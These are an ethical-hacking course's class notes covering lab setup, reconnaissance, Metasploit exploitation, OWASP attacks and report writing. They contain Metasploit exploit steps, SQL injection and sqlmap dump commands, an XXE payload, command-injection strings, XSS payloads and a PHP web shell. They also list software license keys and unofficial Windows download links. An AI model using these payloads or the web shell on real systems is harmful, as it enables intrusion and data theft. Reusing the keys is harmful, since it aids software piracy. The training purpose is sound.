Rinex3 Class Notes

Uploaded by

fejom93713
811 3216 7637

117170
==============

Day 1 - Module 1 - 5/9/23
=========================

Introduction to Ethical Hacking


What is Hacking
Who is a Hacker?
Skills of a Hacker
Types of Hackers
Reasons for Hacking
--------------------------------

Weak Point / Vulnerability

Types of Hacker:
White Hat Hacker = Ethical Hacking or Hacker
Black Hat Hacker = Unethical Hacker
Grey Hat Hacker = Both White & Black

Mr Robot

Skills
------

Kali Linux
Networking
Programming
Vulnerability
Vulnerability Testing
Vulnerability Exploit
Security
etc..

Hacking Lab Setup


-----------------

Task:

Download files ->

VMware = https://www.vmware.com/go/getworkstation-win

Kali Linux = https://cdimage.kali.org/kali-2023.2/kali-linux-2023.2-vmware-amd64.7z

7zip = https://www.7-zip.org/a/7z2301-x64.exe

Servers Metasploitable 2 = https://sourceforge.net/projects/metasploitable/files/latest/download

Bee Box = https://download.vulnhub.com/bwapp/bee-box_v1.6.7z

Windows 7 = https://drive.google.com/file/d/1RTNLLEOtm64CTEr4UmDn1E8vUHToBSjK/view?usp=sharing

https://soft.uclv.edu.cu/Microsoft/Microsoft.Windows.7/en_windows_7_professional_with_sp1_vl_build_x64_dvd_u_677791.iso

Windows 10 = http://185.194.29.37/win10/Win10.21H1.iso

------------------------------------------------------------------------------------
06/09/23

Day 2 - Module 1 - 06/09/23
================

Hacking Lab Setup


-----------------

VMware = MC60H-DWHD5-H80U9-6V85M-8280D

Kali Linux

Windows 7 pro = AXBS6-LR9OV-MEYF5-RMJB9-UCRT2P

Windows 10 pro = W269N-WFGWX-YVC9B-4J6C9-T83GX

Linux server

Task: Setup Your hacking lab

---------------------------------------------------------------------------
07/09/23

Day 3 - Module 1 - 07/09/23
================
Who is at risk for Hacking Attacks?
Effects of computer hacking on an organization
Essential Terminology
Kali Linux fundamentals
----------------------------------------------

Attack
Vulnerability - Weak Points, Loophole
Threat -
Risk -

Linux Based OS
--------------
Apple -> MAC, IOS
Google -> Android
Offsec -> Kali Linux

Whax -> Whoppix -> Backtrack -> Kali

Basics of Computer
Networking

Kali File System


FHS - Filesystem Hierarchy Standard

Root Directory / Folder = /


Home Directory = ~

OS Interface:
GUI -
CLI - Command Line Interface

User:
Root / Admin
Normal - raj, sneha, rocky

pwd = present working directory

Commands:

pwd
ls
cd Desktop
cd ..
cd /
cd
mkdir folder-name
rmdir folder-name
touch file-name
rm file-name

Task:
-----

How to copy file and folder in kali?


How to move file and folder in kali?
How to rename file and folder in kali?
How to edit a file?
How to read a file?
How to update kali?
How to upgrade kali?

---------------------------------------------------------------------
11/09/23

Day 4 - Module 1 - 11/9/23
==========================

Top Information Security Attack Vectors


Types of Attacks on a System
Advanced Commands in Kali Linux
------------------------------

DOS & DDOS


Brute Force
Malware

Injection
Shell File upload
XSS
Brute Force
XML
etc..

Commands:
---------
cp file-name folder-name/
mv file-name folder-name/
mv file-name new-file-name
rm file-name
rm -rf folder-name
rmdir folder-name
nano file-name
sudo apt update
sudo apt upgrade
sudo apt install tool-name
passwd
sudo su
passwd kali
adduser username
su username
sudo cat /etc/shadow

Task: How to create a user group?


How to add users in a group?
File permissions

https://discord.gg/SvEvdSKagT

------------------------------------------------------------------------
12/9/23

Day 5 - Module 1 - 12/9/23
==========================

What is Ethical Hacking


Why Ethical Hacking is Necessary
Scope and Limitations of Ethical Hacking
Hacking Phases
-----------------------------------------

Hacking Phases:

Reconnaissance - Basic Info Gather


Scanning -
Gain Access -
Maintain Access -
cover Tracks -
Report Writing -

Reconnaissance:
Domain name, Subdomain, IP, Web Technologies, Email, phone, dns

OSINT (Open Source Intelligence)


--------------------------------

Target: microsoft

URL = https://www.microsoft.com/en-in
Domain = www.microsoft.com

Commands:

subfinder -d microsoft.com

theHarvester -d microsoft.com -b bing

nslookup microsoft.com

Wappalyzer browser extension for web technologies info

Email & Subdomain = https://phonebook.cz/

dnsrecon -d microsoft.com -t std

Task: Research about Maltego CE.

----------------------------------------------------------------
13/9/23

Day 6 - Module 2 - 13/9/23
===========================

Introduction to Network Security


Introduction to Networking
--------------------------------

Types of Network
LAN - Local Area Network
WAN (Internet) - Wide Area Network

ISP - Internet Service Provider


JIO, Airtel, BSNL, Vodafone, Broadband

Address
Physical = MAC (Media Access Control)
Virtual = IP (Internet Protocol)

Types of IP
Private IP = No Internet
Public IP = Internet

Ip Check
ipconfig -> windows
ifconfig -> Kali linux
Public ip check = https://whatismyipaddress.com/

Ports & Protocols


Physical = usb, hdmi, etc..
Virtual = 65535

21 - ftp (File Transfer Protocol)


80 - http
443 - https

IP Version
IPv4 = 192.168.1.1
4 Octet
0 min
255 max
0.0.0.0
255.255.255.255

4 billion

IPv6 = 2401:4900:1c2b:e4c3:441d:23d4:4ce6:8c67
8
128

78.58.98.01.54 - N | N
1.1.1.1.1 - N | N
0.0.0.0 - V | V
256.25.45.89 - V | N
255.255.255.255 - V | V
256.256.256 - N

0.0.0.0
0.0.0.1
0.0.0.2
0.0.0.255
0.0.1.0
0.0.1.1

Task: Study about Well Known Ports.

-----------------------------------------------------------------

Day 7 - Module 2 - 14/9/23
==========================
3 way handshake
TCP & UDP
Wireshark
-----------------

you (Hi) -> Packet (your ip, your dst ip, your port no, your dst port, your mac, your dst mac, protocol, etc...) -> router ->

Wireshark
---------

Network Traffic Monitoring


Network Packet Analysis
Network Packet Capture

Ping -> icmp Protocol

TCP - Transmission Control Protocol


UDP - User Datagram Protocol

You ---> Google.com

SYN ->
SYN, ACK <-
ACK ->

Transfer data

UDP

Transfer data

Task: Practice Wireshark

-----------------------------------------------------------------

Day 8 - Module 2 - 18/9/23
==========================

Information Gathering
Scanning a Network
Nmap Tool
---------------

Nmap = Network Mapper


Open Ports and Protocol / Service Scanning
Service Version Scanning
OS Detection
Script Scanning

Commands:

nmap ip
nmap -p1-65535 ip
nmap -p80 ip
nmap -p80,21,54 ip

nmap domain.com

nmap -O ip
nmap -A ip

nmap -p21 --script=ftp-anon.nse ip

sudo nmap -p1-65535 -sV -O 192.168.1.88

Task: Scan metasploitable2 study about services.

https://discord.gg/SvEvdSKagT

-----------------------------------------------------------------

Day 9 - Module 2 - 19/9/23
==========================

Attacks using Metasploit framework


Eternalblue Exploit
Metasploitable2 vsftpd exploit
----------------------------------

Metasploit-Framework

Find Vulnerability -> Vulnerability Exploit ->

Scan
Find Vuln
Exploit
Create payload (malware/Virus)

RHOST = Remote Host (Target IP)


RPORT = Remote Port (Target Port)

LHOST = Attacker IP
LPORT = Attacker Port

Metasploit-Framework:
RHOST -> Target IP Address
RPORT -> Target Port No
LHOST -> Attacker IP Address
LPORT -> Attacker Port No

Metasploitable 2 port no 21 vsftpd 2.3.4 backdoor exploit commands:


-------------------------------------------------------------------
msfconsole
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set rhost 192.168.1.28
show options
exploit

meterpreter> id
meterpreter> whoami
meterpreter> ls
meterpreter> pwd

Windows 7 sp 1 Exploit:
-----------------------
445 - SMBv1

Commands:

nmap --script="smb-vuln*" 192.168.1.30

msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
show options
set rhost 192.168.1.30
show options
exploit

meterpreter> sysinfo
meterpreter> shell
meterpreter> screenshare
meterpreter> help

Task: Exploit Windows 7 and Metasploitable 2


Create a report on it and submit

--------------------------------------------------------------

Day 10 - Module 3 - 20/9/23
===========================

Introduction to Web Application


-------------------------------

VAPT
Website -> WAPT
Network -> NPT

Website -> Web Technologies

HTML, PHP, JavaScript, CSS, etc..


Database -> MySQL, Postgresql etc..
Web Server -> Apache, Nginx, IIS etc..
Server (Computer) ->

.html = Hypertext Markup Language

Html tags

.php = Personal Home Page

Code:

<!DOCTYPE html>

<html>

<head>
<title>WAPT</title>
</head>

<body>
<h1>This is hed</h1>
<marquee>Mr. Hacker</marquee>
<p>This is para</p>

<?php
echo "This is PHP";
?>
</body>

</html>

Save this file as .php

Web Root =

Apache2 = /var/www/html/

service apache2 start


service apache2 stop

Task: Create a webpage and access the webpage through apache server in kali

----------------------------------------------------------------

Day 11 - Module 3 - 21/09/23
============================

HTTP Protocol
HTTP Request
HTTP Response
HTTP Methods
HTTP Status Codes
Client Server Communication
----------------------------

Browser (Client) --http request methods--> Server


Browser (Client) <--http Response codes-- Server

Request Method
GET Request -> https://www.google.com/
POST Request
etc..

Response codes
100 - 199 (Info)
200 - 299 (Success)
300 - 399 (Redirect)
400 - 499 (Client Error)
500 - 599 (Server Error)

Live Server Hosting

Hosting = Amazon, Google, Microsoft Azure, Linode, GoDaddy etc..


Free Hosting = 000webhost, wix, infinityfree, etc...
Free Domain

raj.com
raj.in
raj.gov

mrrobot.000.pe -> 72 hr

http
+ ssl certificate
https

Task: Create a webpage and send me your website address.

---------------------------------------------------------

Day 12 - Module 3 - 25/9/23
============================

HTTP Security (HTTPS)


Web servers
Application servers
Database servers
------------------------------

80 - http

http://testphp.vulnweb.com/

443 - https (Secure)

https://www.google.com/

Web Server = Static Content / Static Website

Application Server = Dynamic Content / Dynamic Website

Database Server = Store web content

XAMPP Software = https://www.apachefriends.org/download


Apache
MySql
Wordpress

Server = Computer

xampp apache web root directory = C:\xampp\htdocs

Xampp mysql database = http://localhost/phpmyadmin/

C:\xampp\htdocs\wordpress\wp-config-sample.php

/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'root' );

/** Database password */
define( 'DB_PASSWORD', '' );

Task: Create a wordpress website

------------------------------------------------------------

Day 13 - Module 4 - 26/09/23
============================

Open Web Application Security Project (OWASP)


Injection
HTML Injection
OS Command Injection
---------------------------------------------

OWASP TOP 10 = https://owasp.org/Top10/

OWASP = Open Web Application Security Project

Top 10 Vulnerability List

Injection
---------
Bypass Login pages
Database
Website Defacement
etc..
HTML Injection
OS Command Injection
SQL Injection
etc..

Web Site Input Fields


---------------------
Login Page
Feedback
Comments
Search
Name = <h1>Raj Singh</h1>
email = [email protected]
phone = 9755858555
etc..

HTML Injection
--------------
<h1>Type your text</h1>

OS Command Injection
--------------------
www.google.com;ls
www.google.com;pwd
www.google.com;cat /etc/passwd
www.google.com;hostname

www.google.com&&ls

Task: Practice html & os command injection

-----------------------------------------------------------

Day 14 - Module 4 - 27/9/23
===========================

Broken Authentication
SQL Injection
---------------------

SQL = Structured Query Language

website --------------sql---------------> database

Database Name = account


Table Name = users
id | name | phone | user | pass
------------------------------------------------
1 raj 98454 raj123 123456
2 abc 845848 abc123 45889

Username: raj123; Password: 123456 --------------->

raj123=raj123 True
12345=123456 False

SQL Injection Authentication Bypass

Username: admin'or'1'='1
Password: admin'or'1'='1

Username: raj123
Password: admin'or'1'='1

https://github.com/payloadbox/sql-injection-payload-list

Union Based SQL Injection


--------------------------

http://example.com/xyz.php?xyz=1
https://example.com/xyz.asp?xyz=1

http://testphp.vulnweb.com/listproducts.php?cat=1'
Image Missing
Data Missing
Error

Target URL = http://testphp.vulnweb.com/listproducts.php?cat=1

Tool: sqlmap

Commands:
---------

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --tables -D acuart

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --columns -T users -D acuart

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dump -C name,address,uname,pass -T users -D acuart

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dump -T users -D acuart

Task: Perform sql injection on testphp.vulnweb.com

------------------------------------------------------------------------------------

Day 15 - Module 4 - 03/10/23
============================

Sensitive Data Exposure


Directory Brute-Forcing
XML External Entities (XXE)
----------------------------

Tool: dirb (CLI) / dirbuster (GUI)

dirb http://testphp.vulnweb.com/

XML External Entities (XXE)


---------------------------

Burp Suite

<?xml version="1.0" encoding="utf-8"?>


<!DOCTYPE root
[
<!ENTITY XXE SYSTEM
"file:///etc/passwd">
]>
<reset><login>&XXE;</login><secret>Any bugs?</secret></reset>
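
The defensive side of the document above, as an added example that is not part of the original notes: an XML handler that refuses any document carrying a DOCTYPE, so an entity such as XXE can never be declared. The names parse_untrusted_xml, is_accepted and read_login, and the BENIGN sample, are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class ForbiddenXML(ValueError):
    """Raised when untrusted XML uses a feature the application refuses."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Entities (internal or external) can only be declared inside a DTD, so
    # refusing the DOCTYPE removes the XXE primitive before anything resolves.
    raise ForbiddenXML("DOCTYPE declarations are not accepted")


def parse_untrusted_xml(data: bytes) -> ET.Element:
    # Pass 1: a bare expat parser whose only job is to fail on a DOCTYPE.
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    try:
        checker.Parse(data, True)
    except expat.ExpatError as exc:
        raise ForbiddenXML(f"malformed XML: {exc}") from exc
    # Pass 2: build the tree only after the document passed the check.
    return ET.fromstring(data)


def is_accepted(data: bytes) -> bool:
    try:
        parse_untrusted_xml(data)
        return True
    except ForbiddenXML:
        return False


def read_login(data: bytes) -> str:
    return parse_untrusted_xml(data).findtext("login")


# Constructed sample: the same <reset> message without a DTD.
BENIGN = (b'<?xml version="1.0" encoding="utf-8"?>'
          b"<reset><login>bee</login><secret>Any bugs?</secret></reset>")

# The document from the notes, which declares an external entity.
WITH_DTD = (b'<?xml version="1.0" encoding="utf-8"?>\n'
            b'<!DOCTYPE root [ <!ENTITY XXE SYSTEM "file:///etc/passwd"> ]>\n'
            b"<reset><login>&XXE;</login><secret>Any bugs?</secret></reset>")

if __name__ == "__main__":
    print("benign accepted:", is_accepted(BENIGN), "login =", read_login(BENIGN))
    print("DTD accepted:   ", is_accepted(WITH_DTD))
```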

Task: Perform Directory Brute-Forcing on testphp.vulnweb.com testasp.vulnweb.com

---------------------------------------------------------------------------

Day 16 - Module 4 - 4/10/23
===========================

Broken Access Control


Security Misconfiguration
-------------------------
id | name | phone | user | pass | email | addr
-------------------------------------------------------------------------
1 raj 98454 raj123 123456 [email protected] Punjab
2 abc 845848 abc123 45889 [email protected] Delhi
3 Akshy 7985498 aks123 abc123 [email protected] Kolkata

IDOR (Insecure Direct Object References) Vulnerability / Attack


----------------------------------------------------------------

GET /rest/basket/6 HTTP/1.1 -> GET /rest/basket/4 HTTP/1.1

http://10.10.204.66/note.php?note=1 -> http://10.10.204.66/note.php?note=0

Security Misconfiguration
-------------------------

Weak Credentials

Username: admin
Password: admin

VPLE Download link = https://sourceforge.net/projects/vple/

Task: Perform Broken Access Control

--------------------------------------------------------------------------

Day 17 - Module 4 - 5/10/23
============================

XSS
---

Cross Site Scripting

Input Fields
Search Box
Name = Raj
Phone = 9798989
Email = [email protected]
Comments
Feedback
etc..

Malicious Code
JavaScript
HTML

<script>alert("Mr. Hacker")</script>

<script>document.body.innerHTML="<h1>Hacked by Raj</h1>"</script>

Type of XSS
Reflected
Stored

Task: Perform XSS Stored Attack on DVWA -> Result Hacked by Student Name

-----------------------------------------------------------------

Day 18 - Module 4 - 9/10/23
===========================

Insecure Deserialization
Using Components with Known Vulnerabilities
Insufficient Logging and Monitoring
--------------------------------------------

Insecure Deserialization

serialization

www ------> Database

pass123 --- 0001011110101101010 --> pass123 -> Database

pass123 --- Malicious Data --> RCE -> Server

Cookie Packet

Command:
--------
nc -lnvp 4444

https://assets.tryhackme.com/additional/cmn-owasptopten/pickleme.py

python3 pickleme.py

Using Components with Known Vulnerabilities


-------------------------------------------
Insufficient Logging and Monitoring
------------------------------------

Task: Practice Using Components with Known Vulnerabilities & Insufficient Logging and Monitoring

---------------------------------------------------------------------------------

Day 19 - Module 5 - 10/10/23
============================

Burp Suite
Introduction to Burp Suite
Lab Setup
Working of proxy in Burp Suite
(Buy product)
---------------------------------

Proxy IP : 127.0.0.1
Proxy Port : 8080

GET / HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Post Parameter Tampering

http://burp

{"balance":0,"cost":0}

Task: https://billionth-difficult.000webhostapp.com/buy_flag/#

---------------------------------------------------------------------
Day 20 - Module 5 - 11/10/23
============================

Working of Intruder in Burp suite


Different Attack Types (Sniper, Battering Ram, Pitchfork and Cluster Bomb)
Working of Repeater in Burp Suite
--------------------------------------------------------------

Intruder
--------

Sniper:
1 Wordlist
admin
password
root
test

Username | Password
---------------------
xyz pass123

admin pass123
password pass123
root pass123
test pass123

xyz admin
xyz password
xyz root
xyz test

Battering ram:
1 Wordlist
admin
password
root
test

Username | Password
---------------------
xyz pass123

admin admin
password password
root root
test test

Pitchfork:
2 Wordlist
User | Pass
-----------
admin pass
root toor
abc test
test def
xyz

Username | Password
---------------------
xyz pass123

admin pass
root toor
abc test
test def

Cluster bomb:
2 Wordlist
User | Pass
-----------
admin pass
root toor
abc test
test def
xyz

Username | Password
---------------------
xyz pass123

admin pass
admin toor
admin test
admin def
admin xyz
root pass

Repeater
--------
Task: Perform Brute force on testphp.vulnweb.com

--------------------------------------------------------------------

Day 21 - Module 5 - 12/10/23
============================

Decoder and Encoder


-------------------

Decoder
Comparer
Extensions

Account Bal : 100; Product : 50

Hash cracking = https://md5hashing.net
https://crackstation.net/

Task: Practice Decoder and Comparer.

https://drive.google.com/file/d/1_qosF4qbuO8iQUUdeOKlawgbiQvXBImK/view?usp=sharing

--------------------------------------------------------------------------------

Day 22 - Module 6 - 16/10/23
=============================

Vulnerability Analysis
Introduction to CVSS Scoring
CVSS Calculation
Risk Rating
Severity level analysis
Color coding
------------------------------

Vulnerability Number = CVE Details (CVE-2023-5322) = https://nvd.nist.gov/

Risk Rating => (0.0 - 10.0) CVSS (Common Vulnerability Scoring System) = https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator

Severity level analysis = None, Info, Low, Medium, High, Critical


https://zerodium.com/program.html

CTF = https://overthewire.org/wargames/bandit/

Host = bandit.labs.overthewire.org
Port = 2220
Username = bandit0
Password = bandit0

ssh bandit0@bandit.labs.overthewire.org -p 2220

Task: CTF = https://overthewire.org/wargames/bandit/

--------------------------------------------------------------------------------

Day 23 - Module 7 - 17/10/23
============================

Mitigations
SQL Injection Mitigations
Input Validation
Mitigations to HTML Injection
Mitigations to XSS
Mitigations to Directory Traversal | Demo
-----------------------------------------

Input Validation

Login Page Bypass


Username: admin' or '1'='1
Password: admin' or '1'='1

Bad Character = ''""()--=#^&*<>/

White List = a-z,0-9


Black List = ''""()--=#^&*

Input Field:
Name - a-z, max 15
Phone - 0-9, max 10
Email - @. a-z, 0-9, max 20
etc..
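
The login bypass and its two mitigations side by side, as an added example that is not part of the original notes: a string-built query that the payload above defeats, the parameterized form that treats it as data, and allow-list checks for the Name / Phone / Email rules listed above. The function names and the in-memory SQLite table (modelled on the Day 14 "users" table) are constructed for illustration.

```python
import re
import sqlite3


def make_db():
    """In-memory 'users' table with constructed rows from the Day 14 notes.
    Passwords are plaintext only to mirror the notes; store salted hashes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, "
               "user TEXT, pass TEXT)")
    db.executemany("INSERT INTO users (name, user, pass) VALUES (?, ?, ?)",
                   [("raj", "raj123", "123456"), ("abc", "abc123", "45889")])
    return db


def login_vulnerable(db, username, password):
    # Input is pasted into the SQL text, so a quote in the input ends the
    # string literal and the rest is parsed as SQL.
    query = ("SELECT id FROM users WHERE user = '" + username +
             "' AND pass = '" + password + "'")
    return db.execute(query).fetchone() is not None


def login_parameterized(db, username, password):
    # Placeholders keep the statement fixed; input is bound as a value only.
    row = db.execute("SELECT id FROM users WHERE user = ? AND pass = ?",
                     (username, password)).fetchone()
    return row is not None


# Allow-list rules from the notes: permitted characters and maximum length.
FIELD_RULES = {
    "name": (re.compile(r"[a-z]+"), 15),
    "phone": (re.compile(r"[0-9]+"), 10),
    "email": (re.compile(r"[a-z0-9.]+@[a-z0-9.]+"), 20),
}


def validate(field, value):
    pattern, max_len = FIELD_RULES[field]
    return len(value) <= max_len and pattern.fullmatch(value) is not None


PAYLOAD = "admin' or '1'='1"  # the bypass string shown in the notes

if __name__ == "__main__":
    db = make_db()
    print("vulnerable + payload:   ", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("parameterized + payload:", login_parameterized(db, PAYLOAD, PAYLOAD))
    print("parameterized + real:   ", login_parameterized(db, "raj123", "123456"))
    print("payload passes name rule:", validate("name", PAYLOAD))
```

Validation narrows what reaches the query; the parameterized statement is what removes the injection, so the two are used together rather than one replacing the other.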

Directory Traversal
-------------------
Path Traversal
Dot Dot Slash (../) Attack

Web Root Directory = /var/www/html/


index.html, .php, .css.
javascript, xyz-folder, etc..

http://192.168.1.31/bWAPP/directory_traversal_2.php?directory=documents

http://192.168.1.31/bWAPP/directory_traversal_2.php?directory=../../

http://192.168.1.31/bWAPP/directory_traversal_1.php?page=../../../etc/passwd

/etc/passwd
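
One way to mitigate the dot-dot-slash requests above, as an added example that is not part of the original notes: resolve the requested path to its canonical form and serve it only if it still lies inside the permitted directory. The helper names and the temporary directory tree built in demo() are constructed for illustration; the tree stands in for /var/www/html/documents.

```python
import os
import tempfile


class TraversalError(ValueError):
    """The requested path resolves outside the permitted directory."""


def resolve_inside(base_dir, requested):
    # realpath collapses "../" sequences and follows symlinks, so the
    # comparison is made on where the path really points.
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, requested))
    # commonpath compares whole components; a plain startswith() test would
    # wrongly accept a sibling such as ".../documents_backup".
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise TraversalError(f"{requested!r} escapes {base_real}")
    return candidate


def is_allowed(base_dir, requested):
    try:
        resolve_inside(base_dir, requested)
        return True
    except TraversalError:
        return False


def demo():
    """Build a throwaway web root and check a set of request values."""
    with tempfile.TemporaryDirectory() as tmp:
        docs = os.path.join(tmp, "var", "www", "html", "documents")
        os.makedirs(docs)
        os.makedirs(os.path.join(tmp, "var", "www", "html", "documents_backup"))
        with open(os.path.join(docs, "report.pdf"), "w") as fh:
            fh.write("constructed sample file")
        outside = os.path.join(tmp, "outside.txt")  # stands in for /etc/passwd
        with open(outside, "w") as fh:
            fh.write("constructed file outside the web root")
        os.symlink(outside, os.path.join(docs, "link.txt"))
        requests = ["report.pdf", "../../", "../../../etc/passwd",
                    "/etc/passwd", "link.txt", "../documents_backup/x"]
        return {r: is_allowed(docs, r) for r in requests}


if __name__ == "__main__":
    for request, allowed in demo().items():
        print(f"{request!r:28} allowed={allowed}")
```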

Task: Bypass High level security in bwapp.

---------------------------------------------------------------------------------

Day 24 - Module 7 - 18/10/23
============================

File Upload Vulnerability


-------------------------

Upload Vuln
File Upload Vuln
Shell File Upload Vuln

Upload Options:
CV Upload - .pdf, .doc | .html, .php, .js, .png, etc...
Photo Upload - .jpeg, .png | .pdf, .html, .php
Video Upload - .mp4, .mkv
etc..

Security:
Upload Validation
White List - .jpeg, .png

Magic Number

File Data / Format

WAF = Web Application firewall
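
The upload checks listed above (extension white list plus magic number), as an added example that is not part of the original notes. The function names, the size limit and the sample byte strings are constructed for illustration.

```python
import os
import secrets

# White list from the notes, with the magic number each type must start with.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpeg": b"\xff\xd8\xff",
}
MAX_BYTES = 2 * 1024 * 1024  # assumed limit, not from the notes


def check_upload(filename, data):
    """Return (accepted, reason) for an uploaded file name and its bytes."""
    # Only the final extension counts: "shell.php.png" is judged as .png and
    # must then also look like a PNG; "shell.png.php" is judged as .php.
    ext = os.path.splitext(filename)[1].lower()
    if ext not in MAGIC:
        return (False, "extension not on white list")
    if len(data) > MAX_BYTES:
        return (False, "file too large")
    if not data.startswith(MAGIC[ext]):
        return (False, "content does not match extension")
    return (True, "ok")


def stored_name(filename):
    # Never reuse the client's file name on disk: keep only the checked
    # extension and generate the rest.
    ext = os.path.splitext(filename)[1].lower()
    if ext not in MAGIC:
        raise ValueError("extension not on white list")
    return secrets.token_hex(16) + ext


# Constructed samples: valid headers followed by filler, and a PHP text file.
PNG_SAMPLE = MAGIC[".png"] + b"\x00" * 32
JPEG_SAMPLE = MAGIC[".jpeg"] + b"\xe0" + b"\x00" * 32
PHP_SAMPLE = b"<?php /* constructed placeholder */ ?>"

# A magic-number check does not stop a file that starts with a valid image
# header and carries script text later, so uploads should also be stored
# outside the web root (or in a directory where scripts are not executed).

if __name__ == "__main__":
    for name, body in [("photo.png", PNG_SAMPLE), ("photo.jpeg", JPEG_SAMPLE),
                       ("cv.php", PHP_SAMPLE), ("shell.php.png", PHP_SAMPLE),
                       ("shell.png.php", PNG_SAMPLE), ("photo.jpeg", PNG_SAMPLE)]:
        print(f"{name:15} -> {check_upload(name, body)}")
```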


Php Shell file code:

<?php
echo system($_GET["cmd"])
?>

Save as .php

b374k.php = https://github.com/The404Hacking/b374k-mini/blob/master/b374k.php

Task: Perform shell file upload on dvwa website.

---------------------------------------------------------------------------------

Day 25 - Module 7 - 19/10/23
============================

Mitigations to File Inclusion | Demo


Mitigation to security Misconfiguration
Mitigation to Sensitive Data Exposure
Mitigations to Host Header Injection
Mitigations to XML Injection
---------------------------------------

Mitigation of File Inclusion

Mitigation of Security Misconfiguration

Host Header Injection


---------------------

HTTP Request Header:

GET /hostheader_1.php HTTP/1.1


Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=kpdnauevgrbnci67b57qqmcla1; security_level=0
Upgrade-Insecure-Requests: 1

Host Header Modify:


Host: www.google.com
X-Forwarded-Host: www.google.com

Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution
----------------------------------------------------------------
use exploit/multi/http/php_cgi_arg_injection
show options
set rhost 192.168.1.24
exploit

Task: Exploit php vulnerability on dvwa

---------------------------------------------------------------------------------

Day 26 - Module 8 - 20/10/23
============================

Report Writing
Detailed Reporting of Vulnerabilities with Risk Rating
Findings
Mitigations
Steps to Reproduce
Support Evidence
-------------------

Acunetix, Nessus, Burp-Pro ($)

OWASP Zap (Free)

sudo apt update


sudo apt install zaproxy -y

Task: http://vulnweb.com/ -> Submit vulnerability Scanning report.

-------------------------------------------------------------------

Day 27 - Module 9 - 23/10/23
============================

Interview Preparation and Wrap up


----------------------------------
CV

Pentester
SOC
Cloud Security
IoT Security
Malware Ana

Keywords
Cloud Security 20%
Network Vapt 80%
Linux 100%

CEH Certificate
Comptia Security+

OSCP Certificate

48 hr

24 hr -> 6-7 hack


24 hr -> Report

--------------------------------------------------------------------------

Day 28 - Doubt Class - 25/10/23
===============================

SOC

Pentester

Malware

Cloud Security

Tor Project

Public IP --------- airtel ----- vpn -- tor ----> Google.com

.com, .in, gov etc...

.onion

https://www.torproject.org/download/
